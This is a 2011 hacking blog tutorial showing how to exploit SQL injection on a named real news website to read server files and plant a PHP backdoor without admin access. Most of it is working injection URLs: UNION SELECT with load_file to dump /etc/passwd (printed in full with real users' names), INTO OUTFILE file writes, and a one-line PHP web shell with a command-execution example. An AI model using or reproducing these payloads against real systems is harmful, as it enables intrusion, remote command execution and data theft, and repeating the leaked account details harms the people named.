Uploading Shell Without Getting into Admin Panel
Sunday, July 3, 2011 // by Hacking Beast Editor //
Labels:
Cyber Security,
database,
exploit,
hackers news,
hacking,
keylogger,
knodledge,
tips and tricks,
vulnerability,
website hacking
//
0
comments
I see lot of people SQL injecting and trying their hard luck to get in admin panel to upload a shell.
- This Tutorial is not N00b friendly - If you use Tools for SQL injection don't bother reading this -
- This Tutorial is not N00b friendly - If you use Tools for SQL injection don't bother reading this -
Code:
http://www.trends-in-newsrooms.org/articles.php?id=
Code:
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select+1,2,3,4,5,6,7--
now try to see if you can load_file in the visible column.. We can read files in this server using this command.
Usually you can exec this command if you have access to table mysql.users--
example : - 1 union all select load_file('filetoload'),2,3,4,5,6 from mysql.users--
Ok now lets take the case of this website.. lets try to read its /etc/passwd so we can get the actual path where the website is located.
Code:
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select%20load_file%28%27/etc/passwd%27%29,2,3,4,5,6,7--
Code:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh stephane:x:1000:1000:stephane,,,:/home/stephane:/bin/bash sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false Debian-exim:x:102:104::/var/spool/exim4:/bin/false statd:x:103:65534::/var/lib/nfs:/bin/false identd:x:104:65534::/var/run/identd:/bin/false postfix:x:105:106::/var/spool/postfix:/bin/false postgres:x:106:108:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash sympa:x:107:110:Sympa mailing list manager,,,:/var/lib/sympa:/bin/false ftpd:x:1001:1001::/home/ftp:/bin/nologin juancarlos:x:1002:1002:Juan Carlos Cedillo,,,:/home/juancarlos:/usr/lib/sftp-server clamav:x:108:111::/var/lib/clamav:/bin/false libuuid:x:109:112::/var/lib/libuuid:/bin/sh wanadmin:x:1003:1003:Stephane Karges,,,:/home/wanadmin:/bin/bash aralynn:x:1004:1004:Aralynn McMane,,,:/home/www/vhosts/wan-press.org/httpdocs/nie/downloads/:/usr/lib/sftp-server
Probably this is the path where the site seems to be located, which i am not very sure although... Lets see if we can write a file in this directory..
I dont want any numbers to be written on the file i am going to write into the server. so i am gonna change 2,3,4,5,6,7 to 'null'
Code:
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select%20%27L33t~Shak-PCA~was~here%27,null,null,null,null,null,null+into+outfile+%27/home/www/vhosts/wan-press.org/httpdocs/epic.php%27--
Code:
Can't create/write to file '/home/www/vhosts/wan-press.org/httpdocs/epic.php' (Errcode: 13)
Code:
http://www.trends-in-newsrooms.org/articles.php?id=1+and+2=1+union+all+select 'L33t~Shak-PCA~was~here',null,null,null,null,null,null+into+outfile+'/var/tmp/fayul'--
Code:
http://www.trends-in-newsrooms.org/articles.php?id=-20%20union%20all%20select%20load_file%28%27/var/tmp/fayul%27%29,2,3,4,5,6,7--
Similarly, if you can find path of this website you can write a php backdoor. Replace l33t Shak-PCA was here with..
Shell Code :
Code:
'<? system($_REQUEST['cmd']); ?>'
Code:
http://www.site.com/pathtoyourbackdoor/lol.php?cmd=ls -la
0 comments: